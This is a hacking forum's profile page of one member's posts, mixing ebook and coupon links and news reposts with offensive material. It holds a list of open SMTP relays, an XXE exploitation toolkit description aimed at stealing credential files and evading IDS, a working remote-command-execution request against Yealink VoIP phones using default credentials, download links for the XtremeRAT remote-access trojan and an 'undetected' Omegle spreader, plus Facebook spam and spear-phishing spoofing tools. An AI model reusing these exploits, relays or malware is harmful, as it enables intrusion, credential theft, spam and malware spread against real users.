Jump to content

Fi8sVrs

Active Members
  • Posts

    3206
  • Joined

  • Days Won

    87

Everything posted by Fi8sVrs

  1. Command Guide: CCNA Routing and Switching COMMAND GUIDE Author: Hnnes Rapp Download: http://www.scribd.com/doc/230325474/Command-Guide-CCNA-Routing-and-Switching
  2. http://www.3monkey.me/de 1 Tag - VPN Coupon UL3BPRKUQOMD
  3. 83.169.54.28:25 | no auth | SSL: False | Hostname: void.blackhole.mx | Inbox: False | Blacklist: Not Listed | Time: 17.06.2014 - 17:51:10 85.214.19.236:465 | no auth | SSL: True | Hostname: energy-medienservice.de | Inbox: False | Blacklist: Not Listed | Time: 17.06.2014 - 21:04:36 85.214.33.63:25 | no auth | SSL: False | Hostname: krusty.lupcom.de | Inbox: False | Blacklist: Not Listed | Time: 17.06.2014 - 22:18:28 85.214.33.51:25 | no auth | SSL: False | Hostname: newsletter.hotels-thermen.de | Inbox: False | Blacklist: Not Listed | Time: 17.06.2014 - 22:21:55 85.214.36.39:465 | no auth | SSL: True | Hostname: h2029600.stratoserver.net | Inbox: False | Blacklist: Not Listed | Time: 17.06.2014 - 22:33:10 85.214.38.11:465 | no auth | SSL: True | Hostname: in-flittard.info | Inbox: False | Blacklist: Not Listed | Time: 17.06.2014 - 23:00:24
  4. Basic XXE attack (McAfee ePO) Advanced XXE attack (Mahara) On The Outside, Reaching In is a Python-based toolbox intended to allow useful exploitation of XML external entity ("XXE") vulnerabilities. In the current release, it has two major functions: Read certain categories of file via the target system (either from the target's filesystem, or via HTTP calls to other systems accessible to the target). Trigger memory-exhaustion denial-of-service conditions in certain vulnerable targets. In the future it may be extended to enable similar functionality for the general class of local and remote file-inclusion vulnerabilities. See Future Releases and Planned Features. Conceptually, it is similar to the Metasploit Framework: provide a package of related exploits based around a common core which allows new exploits of similar types to be quickly developed because so much of the code is reusable. The specifics of exploitation are significantly different, however. XML (External) Entity Vulnerabilities (This is a brief summary - for a detailed explanation, see OWASP's XML External Entity (XXE) Processing and Microsoft's XML Denial of Service Attacks and Defenses.) XML (a widely-used — especially in so-called "enterprise" software — markup language) contains a feature called an "entity", which is basically a placeholder (or, for developers, a constant) that is defined once and then referenced later in the document. For example, if I am writing a boilerplate contract, I can define an entity named &companyname; with the value Spectre Security Products at the beginning of the document, and then use &companyname; wherever the contract would normally contain the actual company name (Spectre Security Products). When I have need for an identical contract for a different company (Universal Exports), I update the definition of &companyname; at the beginning of the document, and my work is finished. This type of entity can be misused in several XML libraries to cause the target system to run out of memory — the specific techniques are frequently known as "Billion Laughs", and the "Quadratic Blowup". Both of these are described in detail in the OWASP and Microsoft documents. I am generally uninterested in denial-of-service attacks, but included the capability in On The Outside, Reaching In because it was nearly "free" in terms of development effort and may be useful in certain cases. Where XML entites become interesting (in my opinion) is that the specification also defines what's called an "external entity". As the name implies, this is a reference to information which is stored outside of the XML document. Perhaps the author wants to refer to an image or a table of data maintained by someone else, and this extension of the entity concept allows that to take place, rather than copying the information into the new document. This aspect of the XML specification frequently results in behaviour which is unexpected by the developers using XML libraries, partly because XML has been used for so many types of application in the last 10+ years. Numerous web applications and services receive commands and requests formatted as XML documents. Many of them will internally parse the XML document (which, among other things, usually involves "entity expansion" - replacing the placeholders with the actual value defined for them) and then take action based on the parsed version of the data. For example, perhaps I have written a web-based document library which allows content to be uploaded in the form of XML files. This library receives the files, resolves any entities, and then stores the result for viewing via web browser. But what if one of the entities is a reference to the external file /etc/shadow, and I have made the mistake of configuring the application to run as the root user? If I (the developer) have not designed my system with security in mind, the browsable version of the document now contains a list of all of the user accounts on the system and their password hashes. The first illustration above is of this type of scenario. Nearly every XML library allows for this kind of inclusion of files by exact name. This is still very useful to an attacker, but requires the target file's path to be known or guessed. The Java XML library goes one step further and actually allows directory contents to be listed by the same means, so vulnerable applications written in Java can be used to obtain nearly all of the text-based files from the target system. This type of vulnerability has been understood since 2002 or earlier, but is still surprisingly common — possibly because of the lack of useful automated tools for exploiting such vulnerabilities. Some vulnerabilities require much more complicated techniques to exploit. The second illustration above shows the most elaborate method used by the initial release of On The Outside, Reaching In. It involves working together with an instance of She Wore A Mirrored Mask to perform Yunusov-Osipov-style data exfiltration[2]. Practical And Useful XXE Exploitation Traditionally, XXE exploitation has generally involved single files (the most common example being /etc/passwd as a proof-of-concept of a vulnerability on a Linux or Unix system). While this can be very useful, I believe that realizing the full potential of XXE necessarily involves automation to obtain as many potentially-valuable files from the target system as possible. In the case of Linux and Unix, the culture of that world is such that administrators will often put sensitive, valuable data in text files protected only by filesystem permissions: Database credentials and/or connection strings. SSH private keys. TLS/SSL certificates and their private keys. Lists of valid usernames Configuration files System information (from /proc) Information about installed software and other components (which may reveal vulnerabilities) Even if the filesystem permissions are correct (which in my experience is rarely the case), if a PHP-based web application is running as a specific non-privileged account, that account will still almost always have read access to the file containing its own database connection information (including the password). On The Outside, Reaching In provides the ability to take full advantage of this concept in the form of its --clone mode. Grab all the files you can, and then use grep or your favourite tool to search for information that will reveal further vulnerabilities. Because XML external entities are referenced in the form of URIs, then the potential is there to not only access content from the target server's filesystem, but to use that target server as a reverse HTTP proxy into the environment that is hosting it (as well as any HTTP-based services running on the target server's loopback address or blocked from direct connectivity by a firewall). In other words, instead of specifying file:///etc/passwd for the external entity, imagine the possibilities for URIs like http://127.0.0.1:8080/servlet/SnoopServlet, https://intranet.local/confidential/blueprints/DeathStar.dwg, or ftp://ftp.local/bank_account_list.txt, when those URIs are accessed not by the attacker's system (which hopefully has no network level access to any of them), but by the exposed server with an XXE vulnerability, which is on the same (hypothetical) network that those sensitive internal URIs are pointing to. On The Outside, Reaching In can access intranet URIs of that type today, as long as the full paths are known. A feature is planned for a future release which would allow it to function as an HTTP proxy for web browsers and other HTTP-based pen-testing tools. This would allow interactive browsing and spidering of that content as well. Current Modules The current release of On The Outside, Reaching In includes the following modules: CVE-2012-2239 - Mahara 1.4.x before 1.4.4, and 1.5.x before 1.5.3 (dependent on libxml2 version as well) All modules involve pointing an RSS feed-reader object to a malicious RSS feed hosted using She Wore A Mirrored Mask, and exfiltrate data using a Yunusov-Osipov out-of-band technique[2]. Valid Mahara credentials are required. In most cases, even standard user credentials should be sufficient (in other words, administrative credentials will work, but should not be required). Mahara is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned. To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for this vulnerability. In early June 2014, libxml2 was updated in a way that prevents this set of modules from working. For example, 2.7.8.dfsg-5.1ubuntu4.6 will allow these modules to function, but 2.7.8.dfsg-5.1ubuntu4.8 will not. CVE-2012-2239-ME - Modify the configuration of an RSS feed-reader on an existing page, then attempt to reset it to its original state once exploitation is complete. (1.4.3 and 1.5.2) [ Module created: 2014-03-22 ] CVE-2012-2239-PC-A - Create a new page (using administrative credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ] CVE-2012-2239-PC-U - Create a new page (using standard user credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ] See OTORI - Example 3: Mahara for a detailed tutorial regarding these modules. CVE-2013-6407 - Apache Solr (note: CVE-2013-6408 arguably also applies in some cases) Three distinct vulnerabilities are exploited, giving pen-testers maximum flexibility if the system administrator has disabled access to some functionality. Valid Solr credentials are not required. Solr is a Java-based application, so only ASCII text can be retrieved. In addition, due to the specifics of the vulnerabilities, ASCII text which contains XML/HTML markup cannot be retrieved. There does not appear to be a practical limit on the size of files which can be obtained. To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for these vulnerabilities. CVE-2013-6407-DARH - for Solr versions up to and including 4.3.0. Submits a crafted XML document for analysis (not storage), with the XXE-based content being immediately reflected back in the response from the server. This is the fastest Solr-related module, and works with the largest number of versions. This should be the preferred Solr-exploitation module unless the system administrator has disabled access to the Document Analysis Request Handler or it is paramount to avoid leaving error messages in the Solr log files. [ Module created: 2014-02-15 ] CVE-2013-6407-URH-DI - for Solr versions up to and including 4.0.0. Inserts a crafted document into the Solr index, queries Solr to retrieve the document content (which contains the XXE-based data), then attempts to delete that document. This is the slowest Solr-related module. It is the least likely to generate potentially-suspicious error messages in the Solr logs. [ Module created: 2014-02-15 ] CVE-2013-6407-URH-NMVF - for Solr versions up to and including 4.0.0. Attempts to insert a crafted document into the Solr index, but the document is designed to violate a constraint against a particular field containing multiple values. The insert will fail, and the XXE-based content is immediately reflected back in the server response. [ Module created: 2014-02-15 ] See OTORI - Example 1: Apache Solr for a detailed tutorial regarding these modules. CVE-2014-2205 - McAfee ePolicy Orchestrator from 4.6.0 to 4.6.7 (without Hotfix 940148) (note: only tested with version 4.6.4) Valid ePO credentials are required, and the user account must have permission to import and view dashboards. ePO is a (partly?) Java-based application, so generally only ASCII text can be retrieved. In addition, there are two quirks due to bugs/fully intentional, expected behaviour of ePO: The maximum file size which can be retrieved is around 1KiB. Larger files will be truncated, and will contain a chunk of the dashboard definition appended to the actual content. The first four characters of each file will be replaced with the fifth through eighth characters of the same file. This vulnerability was disclosed by RedTeam Pentesting GmbH, and this module uses a method similar to the one in their example code. CVE-2014-2205-D - Uploads a crafted dashboard definition whose Description field contains the XXE exploit, views the dashboard, then attempts to delete it. [ Module created: 2014-05-26 ] See OTORI - Example 4: McAfee ePO for a detailed tutorial regarding this module, including a walkthrough of how to obtain the ePO database credentials. SOS-12-007 - Squiz Matrix prior to version 4.6.5/4.8.1 (note: only tested with version 4.6.3)) All modules involve making crafted requests (requests for an asset map, by default) to the Squiz instance. She Wore A Mirrored Mask is required for all three, because the vulnerability is triggered using a Yunusov-Osipov technique (entities nested via external XML fragment references)[2]. Valid Squiz Matrix credentials are not required. Squiz Matrix is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned. This vulnerability was disclosed by Nadeem Salim from Sense of Security Labs, and this module uses a method similar to the one in Nadeem's example code. SOS-12-007-YU-404 - Makes a request referring to a non-existent page. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ] SOS-12-007-YU-IU - Makes a request involving an invalid URI. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ] SOS-12-007-YU-OOB - Makes a valid request, with the XXE-based content being exfiltrated using a Yunusov-Osipov out-of-band technique[2]. This is the most reliable and most flexible of the Squiz Matrix modules. The other two are included mainly for tutorial purposes, although they may be able to retrieve slightly larger (a few bytes) files in some edge cases. [ Module created: 2014-03-16 ] See OTORI - Example 2: Squiz Matrix for a detailed tutorial regarding these modules. Known Limitations In the interest of making a potentially-useful tool available sooner rather than later, the current release of On The Outside, Reaching In is a preview which has significant missing functionality compared to the intended "feature-complete" alpha release of the shiny chrome-plated future: Ten working exploits for one commercial product (McAfee ePO 4.6.0 - 4.6.7) and three open-source software packages (Apache Solr, Squiz Matrix, and Mahara) are included. Eventually this number should be far higher. No exploits for systems using Microsoft's XML libraries (SharePoint, etc.) are included (yet). SharePoint itself included a gaping XXE vulnerability up until 2011 (see MS11-074 for details). However, while it's so easy to exploit by hand that even a child could almost do it, trying to automate the process using raw HTTP requests reveals yet another case where beneath its simple-to-use surface, SharePoint is a daunting maze of unexpected complexity. Built-in support for the use of an explicit HTTP proxy is not included. However, you can use tools like proxychains to connect through a proxy. I recommend proxychains-ng / proxychains4, which I have tested successfully for this purpose (specifically, version 4.7). Built-in support for HTTP authentication is not included. If you need to connect to a system configured for HTTP authentication, you can use proxychains-ng / proxychains4 to connect through Burp Suite, and configure Burp Suite to handle platform authentication. While most of the requests sent across the network are designed to be randomized and therefore more difficult for IDS/IPS devices to detect, some of the content (especially more-recently-developed content) is somewhat predictable - in particular, the RSS feed used by the Mahara modules. It has been tested only on Linux (specifically, Debian 7 x64 and Kali Linux 1.0 x64). It has been tested only using Python 2.7.3 (the current default on both test platforms). I briefly tried using it under Python 2.6.5 (the "current" version on my BackTrack 5 VM), and it failed to run due to some of the string-formatting code. It pretends it is capable of HTTP 1.1 requests, but does not support connection re-use. This software has not been tested with IPv6. In addition, each flavour of XML library as well as the vulnerable software introduces its own limitations on the capabilities of this type of tool. Java-based systems typically allow directories to be enumerated, and the included Apache Solr module allows this to be exploited. Although the filesize for content retrieved via this module is effectively unlimited, only text files with no XML markup can be retrieved due to the XML schema which Solr uses. PHP-based vulnerable systems typically allow binary content to be retrieved (because PHP includes a handy (for attackers) function that base64-encodes such data), but the maximum file size is typically about 4K unless it was built with customized compiler flags. Why a New Tool? Initially, I had planned on building this functionality as a set of auxiliary modules for Metasploit. While I am a big fan of Metasploit and use it frequently, I quickly discarded this idea. Metasploit's core purpose (at least in my mind) is remote code-execution on target systems. While it can do other things, the further away any tool gets from its primary function, the less effective and harder to maintain it will become, in my experience. Basic XXE exploitation can be done using a client/server model, but many systems (especially PHP-based systems) require the use of techniques like those described by Timur Yunusov and Alexey Osipov[2], where a third system is necessary to "bounce" parts of the exploit and exfiltrated data off of. This could potentially be emulated or approximated using Metasploit, but it would be difficult and probably not make me any friends among Metasploit's developers. For a tool written and used by hackers, Metasploit sure does have a lot of rules regarding contributions. Metasploit Wiki - 2014-05-10 Guidelines for Accepting Modules and Enhancements Even if the Metasploit developers welcomed this type of functionality with open arms, the flexibility of having the "co-conspirator" service (in this case, She Wore A Mirrored Mask) be decoupled from the main attack tool provides much more flexibility: Example Attack Configurations Basic OOB Separate Systems Master Plan Finally, I feel like it's been too long since any significant new general-purpose security tools were released. Maybe everyone is chasing bug bounties instead of showing how individual flaws can be combined to compromise entire organizations? Why Are You Reinventing The Wheel? At first glance it might seem like I've reinvented the wheel in some places. Why did I make a new library called libdeceitfulhttp instead of using the standard Python httplib library? Why didn't I borrow mitmproxy so I would have proxy functionality already? Unfortunately, while httplib is very useful for most Python-based HTTP clients and servers, it has some very significant limitations when it comes to generating and handling traffic that is intended to mimic as closely as possible traffic from other systems, or which intentionally does not comply with standards in the interest of revealing or taking advantage of security flaws. The main issue I ran into early on is that httplib rigidly adheres to certain aspects of the protocol and does not allow for a way to override that functionality. A simple example is that not only will it only accept an HTTP version of 1.0 or 1.1, its creators chose to represent those values as 0 and 1. Want to work with a client that expects something unusual like 0.9, intentionally leave out the version entirely, or see what happens if you send an HTTP -37.7' OR 1=1 OR '12 request to a server? Well, you're out of luck. Presumably in the interest of making the library easier to work with quickly, other design decisions were also made. The set of headers for a request is represented as a hashtable (sorry, "dictionary") indexed by header name. This immediately prevents interesting requests from being sent where the same header name is included multiple times with different values, to see if e.g. one tier within the target environment will interpret the first value, while another will use the second value. Making things worse (from an accuracy perspective), the hashtable keys are normalized to all-lowercase. This means that if I am writing (for example) an iOS application and a corresponding web API, I can easily detect the presence of a Python-based intermediate system by sending a request header such as X-HaRD-tO-reaD-heADEr: canary and see if the server receives that request unchanged, or if it has been normalized to x-hard-to-read-header: canary, X-Hard-To-Read-Header: canary, etc. mitmproxy seems like a very well-written piece of software, but as far as I can tell it is based on httplib, and so brings those limitations along. The next major hurdle to overcome for On The Outside, Reaching In and She Wore A Mirrored Mask is to rebuild libdeceitfulhttp as a 1:1 replacement for httplib, in which the two main differences are that every parameter is a string (allowing for maximum, dangerous flexibility), and that the headers are represented as a list of tuples with some utility functions to handle accessing them by name. Future Releases and Planned Features Some of the things I'd like to include in future releases (not in any particular order): Completely replace the use of httplib with the pen-testing-friendly equivalent discussed above. Automatically launch a basic SWAMM instance to streamline the most common use of that tool. URI-specific basic IDS/IPS signature evasion. For example, if the current URI to be requested is file:///etc/shadow, then randomly transform it into something like file:///etc/default/../shadow, file:///var/tmp/../log/../etc/default/../shadow, or file:///var/tmp/%2e%2e/log/%2e.%2fetc/default%2f2e./%73%68%61%64%6f%77. The optional ability to specify module options using name/value pairs instead of the current position-based system. Variable support for URI lists (e.g. a list is provided of the content of a typical Apache Tomcat directory structure, it begins with file:///%BASEPATH%/, and at runtime the value for that value is specified so the user doesn't have to generate their own list file every time). Filtered view of modules based on search or other criteria (e.g. what functionality the module supports). Separate groupings of modules for mainline, community-contributed, and user-developed (to avoid stomping on users' files when they upgrade). An option to profile the target (attempt to determine the OS, system specs, etc.). Correct HTTP 1.1 operation (pipelining, etc.). Native proxy support. Authentication (NTLM, Kerberos, etc.) for both webservers and proxies. Fix the --noemptydirs option so that it works as expected in --exacturilist mode. Source
      • 1
      • Upvote
  5. posibil ca a luat link-urile cu copy-paste, va pun ce am gasit: 1.Private Mortgage Lending: The Basics https://www.udemy.com/privatelending?couponCode=buildwealth 2.Study Skills & Time Management for Students https://www.udemy.com/study-skills-time-management-for-students/?couponCode=BUDDY+PASS 3.Productivity Mastery & Time Management https://www.udemy.com/productivity-mastery-professional/?couponCode=BUDDY+PASS 4.The Ultimate Guide to Business Development at a Startup https://www.udemy.com/startup-business-development-guide/?couponCode=REDDIT 5.Joomla 3.0 For Absolute Beginners https://www.udemy.com/joomla-for-absolute-beginners/?couponCode=Joomla 6.SEO Crash Course for WordPress Users https://www.udemy.com/seo-crash-course-for-wordpress-users/?couponCode=wd 7.How To Discover and Fulfill Your Destiny https://www.udemy.com/discover-and-fulfill-your-destiny?couponCode=RedditFree101 8.How to Write a Successful College Application Essay https://www.udemy.com/college-application-essay/?couponCode=REDDIT 9.Bliss Everyday https://www.udemy.com/bliss-every-day/?couponCode=Reddit 10.The Power of Gratitude https://www.udemy.com/the-power-of-gratitude/?couponCode=red 11.Learn how to use Adobe software:Beginner to Power User Level https://www.udemy.com/thinklearnearn/?couponCode=utube-login-free 12.Create and Deploy a Node.js Website to Heroku https://www.udemy.com/nodejs-in-30/?couponCode=FREEREDDIT 13.How To Discover and Fulfill Your Destiny https://www.udemy.com/discover-and-fulfill-your-destiny/?couponCode=RedditFree101 14.Think Google https://www.udemy.com/thinkgoogle/?couponCode=friends-free-dec 15.Career Re-Launch for Moms https://www.udemy.com/career-re-launch-for-moms/?couponCode=REDDITMOM 16.Excel - Basic Excel Course https://www.udemy.com/excel-function/?couponCode=tintin19 17.Learn to program in Java https://www.udemy.com/learn-to-program-in-java/?couponCode=DIZJAVAREDIT3 18.HTML5 CSS3 101 Dreamweaver master concepts Tags vs CSS Rules https://www.udemy.com/html5-tags-vs-css3-rules/?couponCode=manni-summer 19.Dreamweaver Basics 101 - Build a fluid responsive web design https://www.udemy.com/dreamweaver-basics-101-build-a-fluid-responsive-web-design/?couponCode=manni-summer 20.CSS Master Class: Build Media Queries with Dreamweaver CS6 https://www.udemy.com/learn-how-to-build-css3-media-queries/?couponCode=manni-summer 21.Introduction to Data Structures & Algorithms in Java https://www.udemy.com/introduction-to-data-structures-algorithms-in-java/?couponCode=DSALGPR1 22.Boost Your Income From Home-How To Start An Online Business https://www.udemy.com/make-money-from-home/?couponCode=IMStart1 23.How to make a website: Dreamweaver HTML CSS Intro Course https://www.udemy.com/how-to-make-a-website-dreamweaver-html-css-intro-course/?couponCode=eh-learn-free 24.You're Hired: How to Get a Job in Product Management https://www.udemy.com/how-to-get-a-job-in-product-management/?couponCode=bestblack 25.Hacking the Facebook Platform - 7 Favorite Growth Hacks https://www.udemy.com/hacking-the-facebook-platform-7-favorite-growth-hacks/?couponCode=d729b85c480499bc9355ba6596d59b8e 26.Get Your Photo's Published - Quickly, Easily And Profitably! https://www.udemy.com/get-your-photos-published/?couponCode=9e6306786c22b7c06218ae36ab76e038 27.Learn how to use Adobe software:Beginner to Power User Level https://www.udemy.com/thinklearnearn/?couponCode=utube-login-free 28.How to get your website to show up on Google FREE Easy 123 https://www.udemy.com/thinkgoogle/?couponCode=friends-free-dec 29.The Massey Method: Learn Spanish from a Former NSA Agent https://www.udemy.com/dr-masseys-secret-method-for-learning-spanish/?couponCode=DiscountFree 30.Developing Custom Timer Jobs for SharePoint 2013 https://www.udemy.com/developing-custom-timer-jobs-for-sharepoint-2013/?couponCode=REDDIT12 31.Building An Online Business From Scratch In 30 Easy Steps https://www.udemy.com/creating-a-digital-product-and-an-html-website-from-scratch/?couponCode=reddit
  6. Google Apps Script for Beginners Customize Google Apps using apps Script and explore its powerful features Author: Serge Gabet Download: http://www.scribd.com/doc/229683897/Google-Apps-Script-for-Beginners
  7. Yealink VoIP phone version SIP-T38G suffers from a remote command execution vulnerability. Title: Yealink VoIP Phone SIP-T38G Remote Command Execution Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: http://www.yealink.com/Companyprofile.aspx Version: VoIP Phone SIP-T38G CVE: CVE-2013-5758 Description: Using cgiServer.exx we are able to send OS command using the system function. POC: POST /cgi-bin/cgiServer.exx HTTP/1.1 Host: 10.0.75.122 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755) Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 system("/bin/busybox%20telnetd%20start") -- *Mr.Un1k0d3r** or 1 #* Yealink VoIP Phone SIP-T38G Remote Command Execution ? Packet Storm
  8. ISIS just stole $425 million, Iraqi governor says, and became the ‘world’s richest terrorist group’ The Islamic State of Iraq and Syria (ISIS), an al-Qaeda splinter group that has seized a huge chunk of northern Iraq, is led by Abu Bakr al-Baghdadi, a relatively unknown and enigmatic figure. Video: Iraqi forces abandon tanks in Kirkuk - The Washington Post Of the many stunning revelations to emerge out of the wreckage of Mosul on Wednesday — 500,000 fleeing residents, thousands of freed prisoners, unconfirmed reports of “mass beheadings” — the one that may have the most lasting impact as Iraq descends into a possible civil war is that the Islamic State of Iraq and Syria just got extremely rich. As insurgents rolled past the largest city in northern Iraq, an oil hub at the vital intersection of Syria, Iraq and Turkey, and into Tikrit, several gunmen stopped at Mosul’s central bank. An incredible amount of cash was reportedly on hand, and the group made off with 500 billion Iraqi dinars — $425 million. The provincial governor of Nineveh, Atheel al-Nujaifi, said that the radical Islamists had lifted additional millions from numerous banks across Mosul, as well as a “large quantity of gold bullion,” according to the International Business Times, which called ISIS the “World’s Richest Terror Force.” The declaration isn’t an easy one to fact-check. Not only is the definition of “terrorist” nebulous — are murderous but wealthy Mexican cartels terrorists? — it’s also exceedingly difficult to quantify a terrorist organization’s finances. One of the closest stabs anyone has made comes from the well-versed Money Jihad. According to its analysis, which drew on journalistic and academic accounts, the cash seizure would make ISIS the richest terrorist organization in the world — at least for the time being. The Taliban, the New York Times reported, had a one-time annual operating budget of somewhere between $70 million and $400 million. Hezbollah was working with between $200 million and $500 million. FARC in Colombia had annual revenues of $80 million to $350 million. Al-Shabab in Somalia had between $70 million and $100 million socked away. And Al-Qaeda, meanwhile, was working with a $30 million operating budget at the time of the Sept. 11, 2001, attacks, according to the Council on Foreign Relations. Via ISIS just stole $425 million, Iraqi governor says, and became the ‘world’s richest terrorist group’ - The Washington Post
  9. Penetration Testing: A Hands-On Introduction to Hacking Georgia Weidman Download: http://www.scribd.com/doc/229329887/Penetration-Testing-a-Hands-On-Introduction-to-Hacking
  10. Yui's Omegle Spreader [Version 1.4.3.4 - Update 10-6-2014] [info] File Name: Omegle Spreader.exe File Size: 1432576 Bytes Md5 File: 53dccbf507eee9eef4972e3a5df933ab Sha1 File: 8f93781d22788e40cef4b33c22c205a0c2a6bd28 Scan Date: Tuesday, June 10th 2014 | 07:08:51 Status: Clean Result: 0/35 Downloads: Source Version 1.4 Final Yui's Omegle Spreader [1.4.3.4 - Update 10-6-2014] Source: HF
  11. STUB - 1/30 Scan: Fucking Scan Me! - Results XtremeRAT 2.9 - 1/30 Scan: Fucking Scan Me! - Results Compatible with: Download: Download 92.rar from Sendspace.com - send big files the easy way Pass:1a2b7x Source: HH
  12. The hacker group behind a notorious campaign targeting a critical vulnerability affecting multiple versions of Microsoft Internet Explorer has altered its strategy to spread malware using social media, according to security firm FireEye. FireEye senior threat analyst Mike Scott reported the Clandestine Fox hackers altered their attack strategy after Microsoft issued a patch for the IE flaw, in a blog post. Scott said FireEye uncovered the new attack campaign after detecting a number of malicious social network messages targeting its customers. "The attackers used a combination of direct contact via social networks as well as contact via email, to communicate with their intended targets and send malicious attachments. In addition, in almost all cases, the attackers used the target's personal email address, rather than his or her work address," read the post. "This could be by design, with a view toward circumventing the more comprehensive email security technologies that most companies have deployed, or also due to many people having their social network accounts linked to their personal rather than work email addresses." FireEye director of technology strategy Jason Steer told V3 while the Clandestine Fox strikes are only targeting very specific groups, the effectiveness of the tactic means it is only a matter of time before the wider crime community learns from them. "Sites like Facebook and LinkedIn are prime sites to look for and target people. If you create a fake profile with a throwaway email account you can be anyone you like and if you access it via Tor no one knows where you connect from either and hence hard to trace back. Then you connect with the target," he said. "These types of attacks will be reused and recycled into attacks by other gangs in the cybercrime industry as the effectiveness of their APT-style attacks slows. It will then be used by hacktivists, lone hackers and then by general cyber criminals all looking to use their hack against targets of interest or finally against the general man on the street." Steer recommended businesses take a variety of precautionary measures to protect themselves from future social media-based hack campaigns. These include deleting suspicious messages and requests from people you don't know without opening them and using long passwords that are not shared across multiple accounts. Clandestine Fox is one of many hacker campaigns uncovered in recent months. Crowdstrike reported discovering a Putter Panda hack campaign spying on high-tech firms involved in space, aerospace and communications industries earlier this week. Via Clandestine Fox hackers spreading malware via Facebook, Twitter and LinkedIn - IT News from V3.co.uk
  13. @Che http://www.datafilehost.com/d/fe56da46
  14. Pecker Scanner A scanner named pecker, written in php,It can check dangerous functions with lexical analysis. Use: Config: $config = array( 'scandir' => dirname(__FILE__), 'extend' => array('php','inc','php5'), 'function' => array('exec','system','create_function','passthru','shell_exec','proc_open','popen','curl_exec','parse_ini_file','show_source','include','preg_replace'), ); Main: $scaner = new Pecker_Scanner(); $scaner->setPath($config['scandir']); // set directory to scan $scaner->setExtend($config['extend']); $scaner->setFunction($config['function']); $scaner->run(); $result = $scaner->getReport(); Result: Array( [Pecker\test\1.php] => Array ( [parser] => 1 [message] => [function] => Array ( [eval] => Array ( [0] => Array ( [line] => 23 => ( //get itgzinflate ( $str ($str1))) ) [1] => Array ( [line] => 35 [code] => ('$str = time();') ) ) [exec] => Array ( [0] => Array ( [line] => 25 [code] => ('dir') ) [1] => Array ( [line] => 36 [code] => ('dir') ) ) ) ) [Pecker\test\111.php] => Array ( [parser] => 1 [message] => [function] => Array ( ) ) [Pecker\test\3.php] => Array ( [parser] => 1 [message] => [function] => Array ( ) ) ) Download ZIP [b]Info[/b] Home Page: Pecker Scanner | ????? | ????? WeiBo: ???? Source: https://github.com/cfc4n/pecker
  15. Facebook Sharer main features and benefits: Facebook Sharer PRO is able to post in ALL your Facebook groups and fan pages. 100% SAFE! The script uses a Facebook application that will post the messages using the secured Facebook API. With the spintax feature, each posted message is different and the script will post unique content. Facebook Sharer can post REAL SIZE IMAGES, LINKS WITH FULL PREVIEW, VIDEOS and TEXT MESSAGES When adding a new Facebook account, the script is able to detect and import all your associated groups. The script is able to detect the last post in any group and add a your pre-defined comment to that post. HIGH SECURITY: The script can post the messages randomly and it supports spintax. The posted content is unique. The script can post on your Facebook pages wall using your fan page name. The script automatically parses the links from each posted message and it will display the url/image preview. The title, the description and the meta tags of the external links are automatically posted. In admin panel, you can define the maximum number of messages posted and the pause between each post. Facebook Sharer can post REAL SIZE IMAGES, links to websites, videos and text messages. Instant posts feature - you can post multiple messages on Facebook directly from script's admin area. Admin panel to manage your Facebook accounts, message lists, fan pages and campaigns. Scheduled campaigns that will run whenever you want (each minute, each hour, every day, on specific date, etc). Facebook Sharer runs in background and it is totally anonymous. It runs on auto-pilot. Configure the campaigns once and the script will work and share your messages in background. Multiple message lists. You can add the messages one by one or import bulk messages from TXT and CSV files. The ability to post exiting content, text and links from exiting external RSS files. Automatically parse and upload images from external resources (Facebook, Photobucket or from any website). It can post the messages consecutively or randomly. It allows you to post your messages simultaneously using different Facebook accounts. It allows you to post messages in unlimited Facebook groups or fan pages. To post in multiple Facebook groups you will only have to create one campaign. And a lot more... Sales: http://www.facebook-sharer.com/ Demo: http://www.facebook-sharer.com/facebook-sharer-live-demo/index.php Download: http://uppit.com/5jqouojai74u/facebook-sharer.rar
  16. SEES (Social Enginnering Email Sender)A Social Engineering Attack/Audit Tool for Spear Phishing What is SEES? Most of the companies nowadays have their firewalls, threat monitoring and prevention security appliances setup. With these mechanisms in place, security precautions are taken and incidents are monitored. Inbound traffic being restricted, SEES on the other hand is developed for sending targeted phishing emails in order to carry sophisticated social engineering attacks/audits. SEES aims to increase the success rate of phishing attacks by sending emails to company users as if they are coming from the very same company’s domain. The attacks become much more sophisticated if an attacker is able to send an email, which is coming from ceo@example.org email address, to a company with domain example.org. Info Download ZIP Source
  17. SPIP (CMS) Scanner for penetration testing purpose written in Python, and released under MIT License. This tool has been designed to perform detection of SPIP installs during penetration testing. Currently, the tool detects the version of the SPIP install and tries to detect if the platform uses some of the top 30 plugins (listed on their website) Usage: $ python spipscan.py Usage: spipscan.py [options] Options: -h, --help show this help message and exit --website=WEBSITE Website to pentest --path=PATH Path for webapp (default : "/") --plugins Detect plugins installed --themes Detect themes installed --users Bruteforce user logins --sensitive_folders Detect sensitive folders --version Detect version --vulns Detect possible vulns --bruteforce_plugins_file=BRUTEFORCE_PLUGINS_FILE Bruteforce plugin file (eg. plugins_name.db) --bruteforce_themes_file=BRUTEFORCE_THEMES_FILE Bruteforce theme file (eg. themes_name.db) --bruteforce_logins_file=BRUTEFORCE_LOGINS_FILE Bruteforce login file (eg. user_logins.db) --verbose Verbose mode Version detection: $ python spipscan.py --website=http://127.0.0.1 --version Result: Application is located here : http://127.0.0.1/ [!] Version is : 3.0.13 [!] Plugin folder is : plugins-dist/ Plugins detection: $ python spipscan.py --website=http://127.0.0.1 --plugins Result: [!] Plugin folder is : plugins-dist/ [!] folder plugins-dist/ is accessible [!] Plugin breves detected. Version : 1.3.5 [!] Plugin compagnon detected. Version : 1.4.1 